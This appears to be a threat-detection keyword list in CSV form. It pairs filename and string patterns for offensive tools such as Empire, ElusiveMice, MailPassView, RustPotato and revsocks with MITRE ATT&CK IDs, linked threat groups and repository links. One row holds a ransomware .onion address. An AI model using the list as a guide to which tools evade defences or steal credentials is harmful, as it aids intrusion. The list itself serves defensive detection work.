"*elusiveMice.x86.o*",".{0,1000}elusiveMice\.x86\.o.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","43075"
"*Email  Password-Recovery*",".{0,1000}Email\s\sPassword\-Recovery.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43077"
"*emailall.py -*",".{0,1000}emailall\.py\s\-.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","43078"
"*emailall.py check*",".{0,1000}emailall\.py\scheck.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","43079"
"*EmailAll-master.*",".{0,1000}EmailAll\-master\..{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","43080"
"*embargobe3n5okxyzqphpmk3moinoap2snz5k6765mvtkk7hhi544jid.onion*",".{0,1000}embargobe3n5okxyzqphpmk3moinoap2snz5k6765mvtkk7hhi544jid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","43081"
"*embedInHTML.html*",".{0,1000}embedInHTML\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43082"
"*embedInHTML.py*",".{0,1000}embedInHTML\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43083"
"*EmbedInHTML-master*",".{0,1000}EmbedInHTML\-master.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43084"
"*emdnaia/RustPotato*",".{0,1000}emdnaia\/RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","1","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","43085"
"*emeric.nasi@sevagas.com*",".{0,1000}emeric\.nasi\@sevagas\.com.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#email","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","43087"
"*emilarner/revsocks*",".{0,1000}emilarner\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","1","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","43088"
"*empire AttackServers*",".{0,1000}empire\sAttackServers.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","43089"
"*Empire Framework GUI*",".{0,1000}Empire\sFramework\sGUI.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","43090"
"*empire --rest *",".{0,1000}empire\s\-\-rest\s.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43091"
"*empire --server *",".{0,1000}empire\s\-\-server\s.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","43092"
"*Empire.Agent.Coms.*",".{0,1000}Empire\.Agent\.Coms\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43093"
"*Empire.Agent.cs*",".{0,1000}Empire\.Agent\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43094"
"*Empire.Agent.Jobs.cs*",".{0,1000}Empire\.Agent\.Jobs\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43095"
"*Empire.Agent.Stager.*",".{0,1000}Empire\.Agent\.Stager\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","43096"
"*empire.server.api.v2*",".{0,1000}empire\.server\.api\.v2.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43097"
"*empire/client/*.py*",".{0,1000}empire\/client\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43098"
"*empire/server/*.py*",".{0,1000}empire\/server\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43099"
"*empire/server/downloads/*",".{0,1000}empire\/server\/downloads\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43100"
"*empire/server/downloads/logs/*",".{0,1000}empire\/server\/downloads\/logs\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43101"
"*empire/server/downloads/logs/*",".{0,1000}empire\/server\/downloads\/logs\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43102"
"*Empire@bc-security.org*",".{0,1000}Empire\@bc\-security\.org.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#email","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43103"
"*empire_exec.py*",".{0,1000}empire_exec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","43104"
"*empire_server.*",".{0,1000}empire_server\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43105"
"*empireadmin*",".{0,1000}empireadmin.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43106"
"*empire-chain.pem*",".{0,1000}empire\-chain\.pem.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43107"
